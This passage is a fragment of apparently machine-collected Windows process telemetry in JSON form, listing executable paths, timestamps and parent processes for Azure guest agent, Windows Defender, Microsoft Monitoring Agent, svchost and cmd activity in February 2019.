11:04:35.127000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16bc2019-02-10 11:08:29.550000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x1be42019-02-10 11:55:57.567000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1eb42019-02-10 12:12:35.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c2019-02-10 13:16:43.013000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 14:20:50.820000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12382019-02-10 15:24:56.040000\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x9ac2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe0x10782019-02-09 22:55:15.427000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x99c2019-02-09 22:54:40.520000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe0xc142019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe0x1f242019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\